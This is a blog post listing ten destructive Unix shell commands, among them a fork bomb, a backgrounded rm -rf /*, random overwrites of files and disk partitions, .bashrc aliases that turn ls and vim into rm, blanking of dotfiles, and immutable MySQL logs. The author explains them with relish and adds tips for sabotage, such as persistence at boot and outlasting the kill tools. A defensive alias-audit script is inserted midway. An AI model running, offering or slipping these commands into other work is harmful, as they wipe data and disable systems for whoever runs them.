#54 The Ten Commands

@ 07 Mar 2016

These are the single most dangerous commands I could come up with (except for the fork bomb of course, which I did not come up with).



An explanation of how these commands work can be found below. Some notes though:



- Naturally all commands have been properly tested (in virtual machines);

- Most of these commands run just fine without root privileges.



Either it runs just for everything the current user can reach (home folders etc), or it is not affected by lesser privileges, or: well, just be glad sudo requires a password in your setup (right? Right? Tam tam tammm).



#1 :(){ :|:& };:

Classic fork bomb. BAM. (For the uninitiated: a fork bomb keeps forking itself, eating resources until the system dies.) For bonus points: configure it to run when the system starts.



#2 rm -rf /* &

It starts as a classic; remove everything recursively, starting at /. Then two things:

- One; the classic `rm -rf /` is actually prevented from running by rm. So we rm on /* to bypass this.

- Second; we fork it (& at the end). Bonus points for this part: The user can only stop this before the ps and/or kill tools have been removed from the system.



#3 find /* -exec dd if=/dev/urandom of={} count=666 \;

Find everything recursively and do something fun with it. Fun, or random. Hmh.



#4 echo "whoop" > /dev/sda1

Turns out you can write /anything/ to a disk as long as you have sudo rights. Neato!



#5 mv ~/* /dev/null

Did you know you can't move directories into /dev/null? Yeah, just files. So we move all files in the home dir to /dev/null. To counteract the disappointment there you could spice this one up by tying it to find, thus doing it recursively for all files.



#6 echo 'ls=rm -rf' > ~/.bashrc && . ~/.bashrc

I *really* love this one. Put an alias on ls pointing to rm -rf. Any ls you are attempting on any dirs or files will actually not show you anything, but in fact remove it. At this point ls will not output anything on a successful removal, so most likely you'll try a few directories to see why it doesn't give an output. Yay!



#7 "" | tee ~/.*

This might be the subtlest one; it's not entirely obvious at first sight what it's doing. It pipes the ultimate nothing to all hidden files in the home dir. I actually originally thought of doing `> ~/.*` to shorten the command a bit, but it turns out piping can't be done toward multiple files. So you'd have to use tee.



#8 dd if=/dev/urandom of=/dev/sda1 &

Just shake up the main partition a bit. This would be one of the weakest commands here, since it requires root privileges (and is kinda obvious).



#9 echo 'vim=rm' > ~/.bashrc && . ~/.bashrc

A variation on #6, where we make an alias from vim to rm. Few bonus points though: You won't come across this issue as fast, and there is a good chance someone is actively working on a server, looking at some config or whatever. Aaaaaand it's gone.
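
The alias trick in #6 and #9 is easy to check for from the defender's side: scan shell startup files for aliases whose replacement is a destructive tool. The function below is an added example, not part of the original post; the name `audit_aliases` and the list of tools it flags are assumptions.

```shell
#!/bin/sh
# Added example: report aliases in a shell startup file that map a command
# name onto a destructive tool (the pattern described in #6 and #9).
# The flagged tool list (rm, dd, shred, wipefs, mkfs*) is an assumption.

# audit_aliases FILE
#   prints "FILE:LINE: alias NAME -> TOOL" for every finding;
#   returns 1 if at least one alias was flagged, 0 otherwise.
audit_aliases() {
    [ -r "$1" ] || return 0
    awk -v file="$1" '
        BEGIN { found = 0 }
        # Only look at lines of the form: alias NAME=VALUE
        /^[ \t]*alias[ \t]+[^= \t]+=/ {
            line = $0
            sub(/^[ \t]*alias[ \t]+/, "", line)
            name = line;  sub(/=.*/, "", name)
            value = line; sub(/^[^=]*=/, "", value)
            sub(/^["\047 \t]+/, "", value)   # drop opening quote (\047 is a single quote)
            sub(/^sudo[ \t]+/, "", value)    # look past a leading sudo
            split(value, words, /[ \t"\047;]/)
            target = words[1]
            sub(/.*\//, "", target)          # /bin/rm -> rm
            # An alias such as rm="rm -i" is ordinary hardening, so an alias
            # that points at its own name is not reported.
            if (target ~ /^(rm|dd|shred|wipefs|mkfs(\..*)?)$/ && name != target) {
                printf "%s:%d: alias %s -> %s\n", file, NR, name, target
                found = 1
            }
        }
        END { exit found }
    ' "$1"
}

# Stand-alone use: pass the startup files to check as arguments.
for f in "$@"; do
    audit_aliases "$f" || true
done
```

Run it against files such as `~/.bashrc` and `~/.bash_aliases`. It only sees `alias` definitions, so it will not catch a shell function or a script earlier in `PATH` that shadows the same command.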



#10 chattr +i /var/log/mysql.*

The immutability attribute is not all that well known. Most people would know, however, that mysql cannot run if it cannot log anything. As soon as the logs become unwritable mysql shuts down. So we change the immutability attribute on the logs. Have fun looking for the -i attribute!



If you have any remarks or additions, drop me a line on Twitter.